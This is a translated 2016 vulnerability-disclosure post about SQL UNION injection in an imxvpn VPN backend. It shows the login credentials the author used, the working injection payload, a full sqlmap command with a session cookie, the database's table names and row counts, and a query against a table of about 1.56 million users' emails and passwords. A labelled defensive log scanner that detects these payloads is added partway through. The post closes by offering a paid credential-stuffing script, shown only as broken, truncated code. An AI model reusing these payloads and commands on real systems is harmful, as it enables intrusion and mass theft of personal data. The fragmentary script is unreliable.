Vulnerability title: Information leaked from Wiz notes leads to an imxvpn backend SQL UNION injection / 1.56 million (156W) users' email addresses, account names and passwords leaked


Author: 我在不想理你

Submitted: 2016-05-04 16:27

Fixed: 2016-05-09 16:30

2016-05-04: Details have been sent to the vendor and are awaiting the vendor's handling
2016-05-09: The vendor has actively ignored the vulnerability; details are now disclosed to the public







Then I logged in with    mxvpn1/123456





Heaven rewards the diligent: here I found a UNION injection: and 8=7 union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23

sqlmap -u '' --prefix=')' --suffix='%23' -p 'qid' --union-col=13  --cookie='PHPSESSID=sgo3i0sejsv58va4lq362q8h55' --technique=U --threads 10 -D radius --tables --count
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:58:23
[21:58:23] [INFO] resuming back-end DBMS 'mysql'
[21:58:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: qid (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns (custom)
Payload: m=radius&c=faq&a=showfaq&qid=-3805) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5a4e6a4865536f6b7a59766e6f4e487846654d4c70635650685a4469577964514269736e57496453,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL#
[21:58:24] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[21:58:24] [INFO] fetching tables for database: 'radius'
[21:58:24] [INFO] the SQL query used returns 59 entries
[21:58:24] [INFO] starting 10 threads
Database: radius
[59 tables]
| _report |
| alipay_log |
| dmq_action |
| dmq_action_log |
| dmq_auth_group |
| dmq_auth_group_access |
| dmq_auth_rule |
| dmq_datas |
| dmq_datastype |
| dmq_members |
| dmq_modules |
| dmq_online_report |
| dmq_oreport_view |
| dmq_radius_case |
| dmq_radius_email_notice |
| dmq_radius_faq |
| dmq_radius_faq_data |
| dmq_radius_faq_post |
| dmq_radius_faq_type |
| dmq_rebate_apply |
| dmq_rebate_order |
| dmq_rebate_promotion |
| dmq_rebate_promotion_old |
| dmq_rebate_setting |
| dmq_rebate_user |
| mx_rm_coupon |
| mx_rm_goods |
| mx_rm_order |
| mx_rm_order_old |
| mx_rm_radacct |
| mx_rm_syslog |
| nas |
| pre_kaijuan_promotion |
| radacct |
| radacct1 |
| radcheck |
| radgroupcheck |
| radgroupreply |
| radpostauth |
| radreply |
| radusergroup |
| rm_actsrv |
| rm_allowedmanagers |
| rm_allowednases |
| rm_cards |
| rm_changesrv |
| rm_ias |
| rm_invoices |
| rm_managers |
| rm_radacct |
| rm_radacct1 |
| rm_services |
| rm_settings |
| rm_specperacnt |
| rm_specperbw |
| rm_syslog |
| rm_usergroups |
| rm_users |
| usercount |
[21:58:24] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[21:58:24] [WARNING] reflective value(s) found and filtering out
[21:58:50] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
Database: radius
| Table | Entries |
| radacct | 25086862 |
| radcheck | 3214421 |
| rm_users | 1559710 |
| mx_rm_syslog | 1294390 |
| rm_actsrv | 876733 |
| mx_rm_order | 232206 |
| dmq_rebate_promotion | 176086 |
| dmq_rebate_promotion_old | 141286 |
| mx_rm_order_old | 114727 |
| mx_rm_radacct | 38960 |
| dmq_action_log | 34498 |
| dmq_oreport_view | 27616 |
| dmq_rebate_order | 14232 |
| dmq_radius_case | 13897 |
| rm_changesrv | 6911 |
| dmq_online_report | 6447 |
| rm_allowednases | 3637 |
| pre_kaijuan_promotion | 3097 |
| dmq_radius_email_notice | 2685 |
| _report | 529 |
| rm_syslog | 376 |
| nas | 300 |
| rm_allowedmanagers | 222 |
| dmq_radius_faq_post | 102 |
| dmq_radius_faq | 89 |
| dmq_radius_faq_data | 89 |
| alipay_log | 82 |
| rm_services | 81 |
| dmq_auth_rule | 54 |
| mx_rm_goods | 11 |
| rm_managers | 10 |
| dmq_datas | 9 |
| dmq_auth_group_access | 6 |
| dmq_members | 6 |
| dmq_modules | 5 |
| mx_rm_coupon | 4 |
| rm_ias | 4 |
| dmq_auth_group | 3 |
| dmq_datastype | 3 |
| dmq_radius_faq_type | 3 |
| rm_invoices | 3 |
| dmq_action | 2 |
| dmq_rebate_apply | 2 |
| dmq_rebate_user | 2 |
| rm_usergroups | 2 |
| dmq_rebate_setting | 1 |
| rm_settings | 1 |

The rm_users table holds 1.56 million (156W) users; the leaked information includes email addresses, account names, passwords, QQ numbers and other related data.



sql-shell> select * from rm_users limit 0,100
[22:01:54] [INFO] fetching SQL SELECT statement query output: 'select * from rm_users limit 0,100'
[22:01:54] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[22:01:54] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[22:01:54] [INFO] fetching current database
[22:01:54] [INFO] fetched tables' columns on database 'radius'
[22:01:54] [INFO] the query with expanded column name(s) is: SELECT acctype, address, cardfails, city, comblimit, comment, company, country, createdby, createdon, credits, custattr, dis_record, downlimit, email, email_status, enableuser, expiration, firstname, groupid, lastname, mac, maccm, mobile, owner, password, phone, qq, selfreg, srvid, state, staticip, taxid, uplimit, uptimelimit, usemacauth, username, usestaticip, verified, verifycode, verifyfails, verifymobile, verifysentnum, warningsent, zip FROM rm_users LIMIT 0,100
[22:01:54] [INFO] starting 10 threads
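Added here as a defender-side illustration, not part of the original report: a small Python scanner that pulls request parameters out of nginx combined-format access-log lines and flags values carrying the UNION payload patterns seen above. The log lines are constructed; the query strings mirror the report's two payloads, while the IPs, timestamps, sizes and user agents are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed nginx access-log lines (combined format). The query strings mirror the
# two payloads in the report; IPs, timestamps, sizes and user agents are made up.
SAMPLE_LOG = r'''
203.0.113.7 - - [04/May/2016:21:58:24 +0800] "GET /index.php?m=radius&c=faq&a=showfaq&qid=-3805)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5a4e,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 1532 "-" "sqlmap/1.0-dev"
203.0.113.7 - - [04/May/2016:21:50:01 +0800] "GET /index.php?m=radius&c=faq&a=showfaq&qid=12)%20and%208=7%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13%23 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.9 - - [04/May/2016:21:51:10 +0800] "GET /index.php?m=radius&c=faq&a=showfaq&qid=12 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
'''

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "[^"]*" "(?P<ua>[^"]*)"')

# Signatures are matched against URL-decoded parameter values, never the raw target.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("null-column-padding", re.compile(r"\bnull\s*(?:,\s*null\s*){3,}", re.I)),  # column-count probing
    ("hex-concat-marker", re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]{6,}", re.I)),  # sqlmap's hex delimiters
    ("comment-terminator", re.compile(r"(?:#|--\s|/\*)\s*$")),                     # tail of query commented out
]

def decode_query(target):
    """(param, value) pairs of the request target, URL-decoded after splitting,
    so an encoded %23 surfaces as '#' inside the value rather than as a fragment."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def scan_value(value):
    """Names of the signatures that fire on one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]

def scan_log(text):
    """Parse combined-format lines and report each parameter that trips a signature."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        for param, value in decode_query(m.group("target")):
            hits = scan_value(value)
            if hits:
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "param": param, "hits": hits, "ua": m.group("ua")})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["ts"], f["param"], ",".join(f["hits"]), f["ua"])
```

Both injected requests are attributed to the qid parameter, which is the field to watch in this application; the clean request from the second IP produces no finding.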
PS: Dear moderator, may I post a Wiz credential-stuffing script, with anyone who wants to see it required to pay 2WB? If so, please add it for me; if not, just delete this line. The code follows.

import md5
import json
import requests
import xmltodict
from wiz.client import Wiz
from bs4 import BeautifulSoup
def logined(username,password):
'Accept-Encoding':'gzip, deflate',
data='''<?xml version="1.0"?>
print r.content
return len(r.content)>1000
if __name__ == '__main__':
print logined('username','password')

